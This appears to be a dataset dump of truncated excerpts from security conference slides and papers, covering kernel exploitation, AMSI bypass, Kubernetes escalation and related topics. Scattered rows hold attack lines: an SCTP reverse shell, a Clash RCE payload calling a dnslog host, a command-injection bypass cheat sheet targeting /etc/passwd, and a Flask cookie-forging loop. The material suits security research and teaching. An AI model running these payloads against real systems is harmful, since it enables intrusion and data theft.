text
stringlengths
100
9.93M
category
stringclasses
11 values
FORENSIC FAILS SHIFT + DELETE WON’T HELP YOU HERE ERIC ROBI + MICHAEL PERKLIN DEFCON 21 AUGUST 4, 2013 ABOUT THIS GUY ERIC ROBI Founder of Elluma Discovery - 11 years Forensic Examiner Thousands of exams Expert Witness Likes Cats ABOUT THIS OTHER GUY MICHAEL PERKLIN Senior Investigator / Forensic Examiner Securit...
pdf
Keren Elazari aka @K3r3n3 www.K3r3n3.com @K3r3n3 TAKE THE RED PILL? Source : “25 Years Of Vulnerabilities: 1988-2012 Sourcefire Research Report” Solution: Secure What Matters! Life Rights CritInfr IP PII CCN Counter- measures Situational Awareness Operational Excellence Defensible Infrastructure...
pdf
>>> Picking Bluetooth Low Energy Locks from a Quarter Mile Away Anthony Rose & Ben Ramsey [1/42] >>> whoami [2/42] * Anthony Rose - Researcher, Merculite Security - Lockpicking hobbyist - BS in Electrical Engineering - Prior work: Wireless video traffic analysis - Currently focused on BLE security * Ben Ramsey - Resear...
pdf
Push  The  Stack  Consulting http://pushthestack.com Security When Nanoseconds Count a  whitepaper  on  the  security  issues  and challenges  with  next  generation  finance  and  trading  infrastructures Blackhat  USA  Briefings  2011 Abstract There's  a  brave  new...
pdf
道高一尺,牆高一丈:東亞 網絡封鎖和反封鎖技術演進 介紹 蕭強 加大柏克萊分校逆權力實驗室 第一封電子郵件 (1987) : https://bit.ly/2NsTe2Q “Across the Great Wall we can reach every corner in the world” 中大國九互聯網關 https://bit.ly/2NsTe2Q 國家公共網絡監控系統俗稱中國網絡防火牆 (The Great Fire Wall of China,常用簡稱「GFW」 或「牆」)。 網絡封鎖的歷史背景 (1999) • 國家信息化工作領導小組 • 組長: 吳邦國 GFW 成立的背景 https://bit.ly/2uOp7...
pdf
Samsung Pay: Tokenized Numbers, Flaws and Issues  Salvador Mendoza  July 7, 2016  Introduction  Samsung Pay is a new method to make purchases over the latest line of Samsung smartphones devices. The goal is to implement mst technology mainly in every purchase. However, Samsung Pay could use nfc technology as well. Sams...
pdf
1 clash dashboard rce 利⽤限制: jj.yaml payload: Bash 复制代码 1.配置中external-controller监听0.0.0.0(很多订阅地址默认配置即为0.0.0.0) 2.linux环境 3.命令执⾏需管理员登录服务器才会触发 1 2 3 Bash 复制代码 id>/tmp/1.txt: test whoami:  curl clash.jj.dnslog.cn proxies:    -     name: 'jjproxy'     type: ssr     server: jjproxy.com     port: 0     cipher:...
pdf
Slide: 1 Meta-Post Exploitation Val Smith (Valsmith@offensivecomputing.net) Colin Ames (amesc@offensivecomputing.net) Using Old, Lost, Forgotten Knowledge Slide: 2 Valsmith – Affiliations: • Offensive Computing • Metasploit • cDc – Work: • Malware Analyst • Reverse Engineer • Penetration Tester • Exploit developer Slid...
pdf
Trends in Licensing of Security Tools Chuck Willis DefCon 13 July 2005 Most recent slides available at: http://www.securityfoundry.com/ Purpose ● Discuss license trends and how they affect the security community ● Discuss how licensing can be improved (if necessary) ● Educate security tool users about license requ...
pdf
What is wrong with security? What is wrong with security? • Good security says you shouldn’t make assumptions. • Most security products make this same mistake. • This should be called Voodoo security… IDS/IPS • They analyze traffic. • They determine good traffic from bad traffic – With signatures written based on a ...
pdf
Evil eBPF Practical Abuses of an In-Kernel Bytecode Runtime Jeff Dileo DEF CON 27 call_usermodehelper("/bin/sh",(char*[]){"/bin/sh","-c","whoami",NULL},NULL,5) • @chaosdatumz • Agent of chaos • Unix aficionado • Principal Consultant / Research Director @ NCC Group • I like to do terrible things to/with/in: • programs •...
pdf
NIST Special Publication 800-207 Zero Trust Architecture Scott Rose Oliver Borchert Stu Mitchell Sean Connelly This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-207 C O M P U T E R S E C U R I T Y NIST Special Publication 800-207 Zero Trust Architecture ...
pdf
PropLANE!! Kind!of!keeping!the!NSA!from! watching!you!pee! Introduc9on! •  The!guys!up!here! – Mark!Carey!(phorkus)! – Russ!Rogers!(russr)! – Ryan!Clarke!(L0stboy)! – Rob!Bathurst!(evilrob)! •  Guys!not!up!here! – You! History!of!Crypto!Part!I! •  Scytale! •  Caesar!Cipher! •  One!Time!Pad!(OTP)! •  Enigma!Machine! •  ...
pdf
Orange Tsai Orange Tsai DEVCORE 安全研究員 2014 ~ 2017 2017 ~ Now 2008 ~ 2014 2014 ~ 2017 2017 ~ Now 2008 ~ 2014 2014 ~ 2017 2017 ~ Now 2008 ~ 2014 - WAF? • X-www-form-urlencode • Multipart/form-data • Chunked ? return read_file(resolve(root, path)) ? var UP_PATH_REGEXP = /(?:^|[\\/])\.\.(?:[\\/]|$)/ if (pathIsAbsolut...
pdf
Hadoop: Apache’s Open Source Implementation of Google’s MapReduce Framework Hacked Existence Team Joey Calca & Ryan Anguiano http://hackedexistence.com Cloud Computing • Clouds are big piles of other people’s machines, plus virtualization • Remote • Scalable • Virtual • High Level API • Course Grain data processed ...
pdf
Stagefright: Scary Code in the Heart of Android Researching Android Multimedia Framework Security Joshua "jduck" Drake August 7th 2015 DEF CON 23 Agenda Introduction System Architecture Attack Surface Attack Vectors Vulnerability Discovery / Issues Found Exploitability / Mitigations Disclosure Conclusions Introduction ...
pdf
© 2005, Independent Security Evaluators www.securityevaluators.com How Smart is Intelligent Fuzzing - or - How Stupid is Dumb Fuzzing? Charles Miller Independent Security Evaluators August 3, 2007 cmiller@securityevaluators.com © 2005, Independent Security Evaluators www.securityevaluators.com Agenda ▪ Introduction ...
pdf
普通人的GPT免费交流社群 在社群中你会获得: • 定期分享国内可直接免费使用的ChatGPT镜像网址 • 最适合你的ChatGPT、MidJourney使用教程及的高阶玩法 • AI人工智能、ChatGPT、AIGC等最新研报(超过100份)和相关资讯 • 不定期分享ChatGPT变现案例 • 和各路大神畅聊Al、不定期邀请行业大咖演讲互动交流学习 关注公众号 加入交流群
pdf
Social Networking Special Ops: Extending data visualization tools for faster pwnage Chris Sumner @TheSuggmeister www.securityg33k.com Latest Document The latest revision of this paper will be available at http://www.securityg33k.com/wp/BH10.pdf after the conference. This is revision r1.2 Disclaimer I am not ...
pdf
通过将keytab导入wireshark中实现对 Kerberos协议加密部分进行直接解包 本文主要记录了如何通过一些列操作,将生成的keytab导入wireshark,实现可以在wireshark中直 接对Kerberos协议加密部分进行解密的一个过程,避免大家踩坑。 keytab是可以理解为一个密钥表,是key table的缩写,用途类似于用户的密码,keytab中包含一个 或多个条目,每个条目包含一个条目创建时的时间戳,主体名,密钥版本号,加密类型以及密钥本身。 具体关于keytab的信息可以上MIT的Kerberos实现网站上具体查看,这里只大概介绍。 具体操作过程如下: 1.在域控中复制出一...
pdf
营销活动和反作弊 01 业务概述 • 业务形式 裂变/签到/抽奖/走路等 • 风险类型 黑产/自然人/众包等 三方“博弈” 业务概述 反作弊和业务 • 营销反作弊是信任品 • 业务需求第一,事前明确边界 • 我的地盘我做主,重视规则设计 • 知己知彼,不过度承诺 业务概述 • 黑产很精明 收益率高,钞票多多 • 黑产很聪明 对抗是什么,本质是反馈系统 如何干扰攻击者的反馈系统? 查杀分离 延迟/混淆处置 攻击者如何干扰我们的反馈系统? 模拟行为,以假乱真? ...
pdf
Biting the Hand that Feeds You Storing and Serving Malicious Content from Popular Web Servers Billy K Rios (BK) and Nate McFeters Agenda Domain Names and Trust • Who do you Trust? • Biting the Hand - Yahoo • Biting the Hand - Gmail • Flash Based Attacks • URI Use and Abuse • Questions / Conclusions Who do you Trust? ...
pdf
Widdershins: The Hacker Nation Simple Nomad DefCon X - 2002 About Me/This Talk NMRC BindView Skills Needed NMRC BindView Skills Needed NMRC BindView Skills Needed The Year In Review DMCA muscle is flexed. Terrorism. Legislation clarifies various portions of previous laws. More knee-jerk legislation on the way. The Pr...
pdf
WP use https://github.com/noraj/flask-session-cookie-manager import os import string a=string.digits+string.ascii_letters for i in range(0,len(a)): name='python3 ense.py encode -s "KEY_SECRET_PWN_HUB" -t " {\'username\':\'Ne'+a[i]+'\'}"' os.system(name) output: eyJ1c2VybmFtZSI6Ik5lMCJ9.XbpKQQ.Eq9AjAwo7K2lmbRR1k7...
pdf
安全软件开发生命周期(S SDLC) 安全软件开发生命周期(S-SDLC) 与业务安全 与业务安全 自我介绍&培训 高级讲师 包悦忠 • CWASP高级讲师:包悦忠 • 专场培训 1) 北京市朝阳区北四环中路8号 五洲皇冠国际酒店 会议室8 1) 北京市朝阳区北四环中路8号 五洲皇冠国际酒店 会议室8 2) 高级会员免费参与 软件安全保障 (软件安全 • Software Security Assurance (软件安全 保障) is the process (流程) of ensuring that  ) p ( ) g software is designed (设计) to operate at a  level of sec...
pdf
先放上一个图示 方便理解 然后放上目录结构 1 ├─application 应用目录(可设置) 2 │ ├─common 公共模块目录(可更改) 3 │ ├─index 模块目录(可更改) 4 │ │ ├─config.php 模块配置文件 5 │ │ ├─common.php 模块函数文件 6 │ │ ├─controller 控制器目录 7 │ │ ├─model 模型目录 8 │ │ ├─view 视图目录 9 │ │ └─ ... 更多类库目录 10 │ ├─command.php 命令行工具配置文件 11 │ ├─common.php 应用公共(函数)文件 12 │ ├─config.php 应用(公共)配置文件 13 │...
pdf
云@金山 Cloud at KINGSOFT --一种不同的思路做云安全 A different thought in cloud-based security 演讲人: CardMagic (孙明焱) 金山网络 KINGSOFT Agenda 金山云体系 KINGSOFT cloud artitecture 金山云防御 KINGSOFT cloud defense 金山云查杀 KINGSOFT cloud-based anti-virus 关于演讲者 About the speaker… 孙明焱 ID: CardMagic -现任金山网络产品总监,负责金山毒霸相关开发 current product director ...
pdf
Assisted Discovery of On-Chip Debug Interfaces Joe Grand, Grand Idea Studio, Inc. www.jtagulator.com Introduction • On-chip debug interfaces (such as JTAG) are a well-known hardware attack vector - Extract program code or data - Modify memory contents - Affect device operation on-the-fly - Provide chip-level control o...
pdf
Virtunoid: Breaking out of KVM Nelson Elhage July 25, 2011 Nelson Elhage () Virtunoid: Breaking out of KVM July 25, 2011 1 / 42 Outline 1 KVM: Architecture overview Attack Surface 2 CVE-2011-1751: The bug 3 virtunoid.c: The exploit %rip control Getting to shellcode Bypassing ASLR 4 Conclusions and further research 5 De...
pdf
apt install lksctp-tools modprobe sctp lsmod | grep sctp checksctp ​ run SCTP server in one terminal, sctp_darn -H 0 -P 2500 -l sctpshell 0x00 0x01 run SCTP client in another terminal, sctp_darn -H 0 -P 2600 -h 127.0.0.1 -p 2500 -s ​ ​ ​ ​ 0x02 ​ ​ sudo apt-get install ksh /bin/bash -i > /dev/sctp/host/port 2>&1...
pdf
Satellite Imagery Analysis Greg Conti gjconti@rumint.org image: nasa.gov The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. http://ehp...
pdf
Total Endpoint Protection: #1 in EDR & Next-Gen AV No Win32_Process Needed Expanding The WMI Lateral Movement Arsenal Total Endpoint Protection: #1 in EDR & Next-Gen AV About Me o Security researcher – Cybereason o @PhilipTsukerman o Probably really stressed out right now Total Endpoint Protection: #1 in EDR & Next-Ge...
pdf
Insecure.Org Insecure.Org Mastering the Nmap Scripting Engine by Fyodor and David Fifield http://insecure.org/presentations/BHDC10/ Black Hat Briefings Las Vegas July 28; 4:45 PM; Augustus 5+6 Defcon 18 July 30; 5:00 PM; Track One Insecure.Org Insecure.Org Abstract Most hackers can use Nmap for simple port scanning and...
pdf
macOS/iOS Kernel Debugging and Heap Feng Shui Min(Spark) Zheng @ Alibaba Mobile Security Outline Alibaba Security • Introduction • macOS Two Machine Debugging • iOS Kernel Debugging • Debugging Mach_voucher Heap Overflow • Traditional Heap Feng Shui • Port Feng Shui • Conclusion Whoami • SparkZheng @ Twitter,蒸米spark @ ...
pdf
Java安全之Dubbo反序列化漏洞分析 0x00 前言 最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo 概述 Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于 提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并 且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、 redis等多种协议。 运行机制 Dubbo框架启动,容器Container一启动,服务提供者Provider会将提供的服务信息注册到注册中心 Regi...
pdf
Hacking the Mind: NLP and Influence by Mystic Goals for Talk Introduction to NLP Tools for using NLP to influence Gaining rapport Motivation strategies Submodalities Milton Model What is NLP? Neuro-Linguistic Programming Neuro: Our neurology and our five senses Linguistic: The language we use to describe our word and com...
pdf
// `id` $(id) \nid idwhoami id&&whoami id||whoami // {ls,-l} ls\t-l $(printf "\154\163") l''s'' l""s l``s l\s ls$u cat /???/pass* cat /etc$u/passwd cat /etc/pass{wd,} a=c;b=a;c=t; $a$b$c 1.txt //base64 echo 'cat' | base64 `echo 'Y2F0wqAK' | base64 -d` 1.txt //base64cat /etc/passwd echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -...
pdf
node_to_clusteradmin-如何从Kubernetes节点权限提升⾄集群管理员权限.md 5/23/2022 1 / 8 如何从 Kubernetes 节点权限提升⾄集群管理员权限? 我有幸参加了去年的 KubeCon 并分享议题,议题的其中⼀个攻防案例讲述了如何从⼀个边缘业务的开发者权 限逐步提升⾄ Kubernetes 集群管理员权限;其中最后⼀步的⼿法,是描述关于节点上利⽤ DaemonSet 和 Pod 上的 ServiceAccount token 进⾏提权,那⼀年我在补天上的议题也简述了这个⼿法。在今年的 KubeCon 欧洲上,这样的攻击⼿法被命名为了"蹦床"。快速过完国外的这篇 slide 之后,深感他...
pdf
EMET 4.0 PKI MITIGATION Neil Sikka DefCon 21 ABOUT ME • Security Engineer on MSRC (Microsoft Security Response Center) • I look at 0Days • EMET Developer • I enjoy doing security research on my free time too: http://neilscomputerblog.blogspot.com/ • Twitter: @neilsikka OVERVIEW 1. What Is EMET? 2. New Features in EMET ...
pdf
Cyberterrorism & the Security of the National Drinking Water Infrastructure John McNabb johnmcnabb@comcast.net DEF CON 18 July 31, 2010 1 Introduction • IT Pro, 5 years; have a few certs…. • Water Commissioner, 13 years, 1997-2010 • Mass. DEP 6 years, 1983-1986, Legislative Liaison • Clean Water Action, 10 y...
pdf
*** Check out http://fort.ninja/defcon24 for the latest version of this information *** @evanbooth Shotgun Of RANDOM ™ http://fort.ninja/defcon24#shotgun Finding Potential throughout history… George Washington Carver Foods Salted Peanuts Peanut Butter, regular (3) Breakfast Food #1 Butter from Peanut Milk Br...
pdf
Devil&is&in&the&Details:&Revealing&How& Linux&Kernel&put_user at&Risk Edward&Lo&and&Chiachih Wu C0RE&Team About&Us • 羅元琮 (Edward) – 奇虎 360&安全研究開發工程師 – 專職內核漏洞挖掘與利用 – “360&超級 ROOT”&技術負責人 • 吳家志 (@chiachih_wu) – 奇虎 360&安全研究開發工程師 – Android/Linux 系統安全研究 – C0RE&Team&(c0reteam.org)&創始成員 CVE-2013-2094&(perf_swevent_init) CVE-20...
pdf
Beyond Root Custom Firmware For Embedded Mobile Chipsets Biography Christopher Wade Security Consultant at Pen Test Partners @Iskuri1 https://github.com/Iskuri https://www.pentestpartners.com Project Origin Smartphones contain a huge amount of closed firmware This limits the capabilities of even rooted devices By brea...
pdf
- 2 - u Dongsung Kim u Graduate Student, Sungkyunkwan University u @kid1ng / https://kidi.ng u Hyoung-Kee Choi u Professor, Sungkyunkwan University u https://hit.skku.edu/~hkchoi - 3 - u Motivation u Tizen Security Internals u Dan the D-Bus Analyzer u Privilege Violations u Conclusion 1 - 5 - u Samsung’s smartwatch pro...
pdf
Jeremy Chiu, Lead Security Researcher, X‐Solve Lab Armorize Technologies 2007‐07‐21 Prefix 由於近日惡意網頁的問題頻傳,讓駭客利用惡意程式大量 入侵,造成了許多政府機關及各企業的機密資料外洩等資 安問題。 為了對抗惡意網頁及伴隨而來的網路犯罪問題,今年阿碼 科技公司的艾克索夫實驗室研究團隊特別企劃了一個研究 計畫,針對了台灣區網站進行大規模資安檢測。對於現階 段的惡意網站問題與惡意程式掛馬兩大部分進行研究,在 這個報告中將對於植入的技術與惡意程式做深入的技術分 析,活生生的內容,讓您了解目前台灣區的各機關與公司 網站被入侵現況。 Taiwan...
pdf
Research Demystifying Kernel Exploitation by Abusing GDI Objects Saif El-Sherei saif@sensepost.com ! Demystifying Kernel Exploitation by Abusing GDI Objects 2017-07-18! ! ! ! ! pg.!2! ! Introduction In this paper, we will discuss integer overflows that lead to Kernel Pool memory corruption. We will go through d...
pdf
Who’s&this…&guy& • 10&years&on&the&defensive&side& • File&analysis&&&RE& • Recently&doing&research&using&machine& learning& Level&Se?ng& • ROP& • Technique&to&bypass&nonFexecutable&memory& • Bounce&around&in&memory&execuIng&small& gadgets&that&typically&end&with&a&return& instrucIon& • PIN& • Pin&is&a&dynamic&binary&in...
pdf
Exploiting JRE - JRE Vulnerability: Analysis & Hunting @Hitcon 2013 xye0x01@gmail.com nforest@live.cn About Us • Xiao Lee(xye0x01),Sen Nie(nforest) • SHANGHAI JIAO TONG UNIVERSITY • Major in Computer Science and Technology • J2EE Development/Program Analysis/ JRE Vulnerability Research/XSS Abstract •Exploiting Applet...
pdf
CommonCollection1 InvokeTransformer // // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package org.apache.commons.collections.functors; import java.io.Serializable; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import org.apach...
pdf
Who  am  I? •  11  years  in  InfoSec  with  5  years  of hobby  work  prior  to  that •  Primary  interests:  penetra;on  tes;ng, intrusion  detec;on,  and  log  correla;on •  Currently  employed  as  an  InfoSec generalist  at  a  cloud  provider •  Previ...
pdf
Nathan  Hamiel Principal  Consultant Associate  Professor  at  UAT Marcin  Wielgoszewski Security  Engineer •  Reliance  on  tools  can  =  Fail! – Many  more  people  tes4ng  web  apps – Vendors  play  catch-­‐up – Success  is  on  your  shoulders •  Difficult  ca...
pdf
Re-establishing Trust in Compromised Systems: Recovering from Rootkits that Trojan the System Call Table Julian B. Grizzard, John G. Levine, and Henry L. Owen {grizzard, levine, owen}@ece.gatech.edu School of Electrical and Computer Engineering Georgia Institute of Technology Atlanta, Georgia 30332–0250, USA Abstract. ...
pdf
陆柏廷 | BT 漏洞盒子 高级安全研究员 漏洞盒子简介 漏洞盒子 互联网安全服 务平台 FreeBuf 互联网安全新 媒体 网藤风险感知 基于SaaS模式的自 动化企业安全风险 感知服务平台 自有安全团队与外部 安全专家结合,共同 为厂商提供安全一体 化解决方案 安全专家 相关机构 厂商  厂商:金融、保险、电商、互联网、通信等  相关机构:CNCERT、CNNVD、 SERCIS、 SHCERT、公安部第三研究所、中国民航测评中心、 天津网安等 演讲提纲 前 言 场 景 方 法 企业安全测试进化史 1.0 2.0 3.0 基于功能/ 性能的”安 全测试” 基于漏洞类 型的安全测 试 基于业务场 景的安全测 试 何为业务场景 ...
pdf
Copyright © 2010 Trustwave. All Rights Reserved. A Whitepaper for DEF CON 18, July, 2010 This is not the droid you're looking for... Christian Papathanasiou Nicholas J. Percoco June 21st, 2010 Trustwave - 2 - Copyright © 2010 Trustwave. All Rights Reserved. A Whitepaper for DEF CON 18, July, 2010 Table of Con...
pdf
DEF CON 101 THE PANEL SUPER N00B KART Welcome to Las Vegas Pace yourself THIS IS DEF CON DGAF Everyone was a n00b once. All of us are still n00bs at something. THIS IS THE DESERT Stay hydrated All Good Sit Down And Drink Grab A Glass of Water Call A Doctor THE COUNTDOWN Simple rules for surviving...
pdf
Bypass AMSI的前世今生(5) - 内存补丁 0x00 前言 内存补丁是目前bypass amsi最常用的技术之一。通过前几篇文章,我们已经知道AMSI检测相关API的调 用顺序: 我们还是以powershell为例,当我们打开powershell.exe,powershell.exe会加载 System.Management.Automation.dll,此dll会调用amsi.dll,因此我们只要分析清楚这2个dll里面的函 数调用和判断逻辑,就能在合适的地方修改判断逻辑,使得程序判断结果为我们指定的结果。 0x01 流程分析 我们先使用ILSpy反编译System.Management.Automation.dll,在...
pdf
GPS SPOOFING Low-cost GPS simulator HUANG Lin, YANG Qing Unicorn Team – Radio and Hardware Security Research Qihoo 360 Technology Co. Ltd. Who we are? Unicorn Team •  Qihoo360’s UnicornTeam consists of a group of brilliant security researchers. We focus on the security of anything that uses radio technologies, fr...
pdf
网鼎杯-青龙组WP Author:Nu1L 网鼎杯-青龙组WP Web AreUSerialz trace notes filejava Re signal joker bang Pwn boom1 boom2 faster0 Misc 签到 Crypto you raise me up boom Web AreUSerialz bypass即可: str=O%3A11%3A"FileHandler"%3A2%3A%7Bs%3A2%3A"op"%3Bs%3A17%3A"2.00e%2B00000000 000"%3Bs%3A8%3A"filename"%3Bs%3A18%3A"%2Fweb%2Fhtml%2Fflag.php"%3B%7D...
pdf
GTVHACKER Google TV Or: How I Learned to Stop Worrying and Exploit Secure Boot GTVHACKER GTVHacker: The Team •  GTVHacker is a group of 6 hackers with individual skill sets who work together to unlock Google TV devices. •  Our primary goal is to bypass hardware and software restrictions to allow for unsigned ke...
pdf
顶级域攻击与接管指南 > ABOUT ME 0 1 • ztz @360高级攻防实验室 • 专注攻防对抗研究、漏洞挖掘、武器开发 • // Google Hall of Fame • // Golang • // Ruby • // Homebrew > 主要内容 0 2 • DNS Protocol 介绍 • 云 DNS 场景劫持探讨 • 顶级域 DNS 场景劫持探讨 > DNS 协议 0 3 • 诞生于 1983 年,不断更新到现在 • 实现主机与 IP 地址转化的“互联网电话簿” • ICANN 负责域名系统的维护和运作 > DNS 协议 0 4 > 域名组成 0 5 sub.domain.tld. 子域 权威域 顶...
pdf
我这10年的“搞站”路 我叫老牛,是高中室友给起的,原因很简单,我在8人寝室年龄排第六,四川话“老6”和“老牛”读音相仿。 后来我就把我的qq昵称改成了“L.N.”,我接受了这个称呼,因为自我审视,性格的确有执拗的一面,内 向且不善言谈。我以“老牛”的称呼警醒自己,大学就去参加了很多社团和当了2年团支书,得到了不错的 改善。扯远了,说回来,“L.N.”是我踏上“搞站”路的第一个代号,中途换过几个,发现还是L.N. 更“像”我,就这样一直用到现在。 第一次知道破解别人QQ空间密码是可以学习的,也是在高中。于是迫不及待的学习了一些如今看来都是 违法乱纪的技术手段,最后qq空间密码没破解开,倒是认识了很多技术上的好朋友,大家一起开开心心 ...
pdf
Through the looking-glass, and what Eve found there http://www.s3.eurecom.fr/lg/ Luca 'kaeso' Bruno <lucab@debian.org>, Mariano 'emdel' Graziano <graziano@eurecom.fr> 2 10/08/2014 About us • S3 group at Eurecom (FR) - System security – Embedded systems – Networking devices – Critical infrastructures – Memory forensics ...
pdf
智能合约安全开发 Ali0th Email :martin2877@foxmail.com 智能合约安全开发 1. 相关概念 2. 安全事件 3. 审计之路 4. 常见漏洞 5. 常用工具 智能合约 智能合约(Smart Contract)是以太坊中最为重要的一个概念,即以计 算机程序的方式来缔结和运行各种合约。最早在上世纪 90 年代,Nick Szabo 等人就提出过类似的概念,但一直依赖因为缺乏可靠执行智能合约的 环境,而被作为一种理论设计。区块链技术的出现,恰好补充了这一缺陷。 以太坊支持通过图灵完备的高级语言(包括 Solidity、Serpent、Viper) 等来开发智能合约。智能合约作为运行在以太坊虚拟机(Ethe...
pdf
timeless attackpipeline 0x00 rce blackhattimeless attack timeless attacktimeless attack 0x01 timeless attack blackhathttps://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Timeless-Timing-Attacks.pdf TQLCTFwriteup https://blog.zeddyu.info/2022/02/21/2022-02-21-PracticalTimingTimeless/ str = "hello" for i in range(le...
pdf
Building a Real Session Layer D.J. Capelis Defcon 16 Let's start at the beginning It's easier to end at the end when you start at the beginning What's a Session Layer? ISO 7 Layer Model (Designed by committee) 1 – Physical Layer (e.g. Cat 6, Fiber, Air) 2 – Data Link Layer (e.g. Ethernet, 802.11[abgns...], FDDI) 3 – Ne...
pdf
8/20/14 Open Source and CSIRT - What can we do?- Presented by: Yoshiki Sugiura, CSIRT Evangelist Shin Adachi, CISSP, CISM, CISA, PMP Congratulations HITCON on your 10th Anniversary! FIRST OF ALL 8/20/14 This presentation ONLY reflects personal views and opinions of the presenters, NOT presenters’ affiliations ...
pdf
Attacks from a New Front Door in 4G & 5G mobile networks Dr. Altaf Shaik & Shinjo Park TU Berlin & FastIoT Blackhat USA 2022 Attacks so far in mobile networks ● Radio access network – IMSI catchers, False base stations ● Signaling interconnect – SS7, Diameter interfaces ● SIM attacks – authentication, sim jacker ● SM...
pdf
1 ASP.NET下的内存⻢:Route内存⻢的N种写法 前⾔ System.Web.Routing Route内存⻢ ⾃⼰实现RouteBase GetRouteData GetVirtualPath 优先级 利⽤System.Web.Routing.Route 注⼊RouteHandler 注⼊HttpHandler 路由问题 添加到第⼀位 测试 参考 @yzddmr6 asp.net下的内存⻢研究⽂章⽐较少,⽬前提到过的包括虚拟路径内存⻢以及HttpListener内存⻢。最近 研究了⼀下其他类型的内存⻢,发现.net可以利⽤的地⽅要多得多。所以准备写个系列⽂章,讲⼀讲 asp.net下的内存⻢。 ⽂章仅作研究性质,不保证...
pdf
Media over Coaxial Alliance (MoCA): Operation and Security Posture Andrew Hunt Volgeneau School of Engineering,George Mason University Fairfax, VA ahunt5@masonlive.gmu.edu Abstract— Media over Coax Alliance (MoCA) is a protocol specification to enable assured high-bandwidth connections for the high demands of v...
pdf
 0xcsandker  csandker  RSS Feed //Posts //History of Windows //Archive //Tags & Search //ME  Switch Theme Offensive Windows IPC Internals 2: RPC 21 Feb 2021 (Last Updated: 19 5⽉ 2021) >> The Series >> Introduction >> History >> RPC Messaging >> RPC Protocol Sequence >> RPC Interfaces >> RPC Binding >> Anonymous & A...
pdf
Frevbhfyl? Ntnva? Ebg guvegrra? Whfg jung qb lbh gnxr zr sbe? QmFzZTY0PyBOb3cgeW91J3JlIGp1c3QgcmVhY2hpbmcuLi5UaGluZ3MgYX JlIG9ubHkgZXZlciBhcyBjb21wbGljYXRlZCBhcyB0aGV5IG5lZWQgdG8gYmU uICBCdXQgaWYgeW91IGdldCBzdHVjaywgd2hlbiB5b3UncmUgYmx1ZSwgd HJ5IHR1cm5pbmcgdXAgdGhlIGhlYXQuICBJdCB3aWxsIG1ha2UgeW91IHRo aW5rIHlvdSdyZSB...
pdf
我是衬衫 忍者的弟弟 今天我去 TG 看片 发现了一个机器人 感觉很好玩 那我们也整一个 用来扫描吧! 首先 我们去买一个服务器 好的 1 分钟过去了 我们买完了 我们现在需要注册一个机器人 @BotFather TG 加他 起一个好听一点的名字就可以了 很快啊 我们就拿到了自己的 Token https://core.telegram.org/bots/api 这个是 API 文档 可以随便看看 我建议大家先去看一次 python-telegram 那么开始吧 导包下 from telegram import Update,Bot from telegram.ext import Updater, CommandHandler, ...
pdf
2009 年駭客年會徵求論文 HIT 2009      Call For Paper  時間:2009 年 7 月 18 日~19 日(星期六~星期日) 主辦單位:CHROOT – Security Research Group (http://www.chroot.org) TWISC – Taiwan Information Security Center (http://www.twisc.org) 活動網址:http://hitcon.org 台灣第五屆駭客年會將於 2009 年 7 月 18~19 日(週六、日)舉行,歡迎各 界人士踴躍投稿。論文內容以探討實作技術並能演講 5...
pdf
IT Audit: Security Beyond the Checklist This paper is from the SANS IT Audit site. Reposting is not permited without express written permission. Copyright SANS Institute Author Retains Full Rights Interested in learning more? Check out the list of upcoming events offering "IT Security Audit and Control Essentials (Audi...
pdf
ProxyLogon is Just the Tip of the Iceberg A New Attack Surface on Microsoft Exchange Server! Orange Tsai USA 2021 Orange Tsai • Orange Tsai, focusing on Web and Application 0-day research • Principal Security Researcher of DEVCORE • Captain of HITCON CTF Team • Speaker of Security Conferences • Black Hat USA & ASIA / D...
pdf
DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 1 / 40 DNSSECTION Hadrien Barral  Rémi Géraud-Stewart  Amaury Barral David Naccache École normale supérieure @ PSL University / QPSI @ Qualcomm Technologies Inc. What is this about ■ An e-mail privacy breach in the largest French cloud provider ■ The first practical attack ...
pdf
Nu1L-ZCTF-Writeup ——By Nu1L 全员 部分脚本请见附件 Misc 类 Misc10-签到题 直接新浪微博搜下: MISC100 xctf 竞赛规则 开始完全没思路,解压 word 得到的 document.xml 发现一堆烫然而并没有什 么思路,后来根据提示宽窄间距,想到是烫的间距,利用 python 的 xml 库写一 个小的脚本就可以得到一串 01,转化 ascii 就可以了。中间需要注意的是不能光 提取 xml 的间距,还需要乘上中间的烫的个数。 import xml.dom.minidom import sys reload(sys) sys.setdefaultencodi...
pdf
Federation & Empire Emmanuel Bouillon manu@veryopenid.net DEF CON #19 - 7th August 2011 Prelude to Federation Forward the Federation Federation Federation and Empire Federation’s Edge Federation and (down to) Earth Prefatory notes $ whoami Having fun in INFOSEC for a while SSTIC, PacSec, BlackHat EU, Hack.lu, #Days CVE...
pdf
1 Copyright © 2011 Juniper Networks, Inc. www.juniper.net AppSecure Brad Woodberg, Juniper Networks bwoodberg@juniper.net twitter: @bradmatic517 Defcon 2011 Network Application Firewalls: Exploits and Defense 2 Copyright © 2011 Juniper Networks, Inc. www.juniper.net AGENDA Discussion  Beyond ...
pdf
Android Universal Root Exploiting xPU Drivers Xingyu Jin Richard Neal Jon Bottarini #BHUSA  @BlackHatEvents #BHUSA   @BlackHatEvents Who are we? Jon Bottarini @jon_bottarini Xingyu Jin @1ce0ear Richard Neal @ExploitDr0id #BHUSA   @BlackHatEvents What are we talking about? ● Rooting exploits on Android ○ In-the-wild ○ ...
pdf
We are Legion: Pentesting with an Army of Low-power Low-cost Devices Philip Polstra Hacker in Residence University of <Redacted> @ppolstra http://polstra.org What is this talk about? ● Hacking and/or forensics with small, low-power devices ● ARM-based Beagleboard & Beaglebone running full suite of security/forensi...
pdf
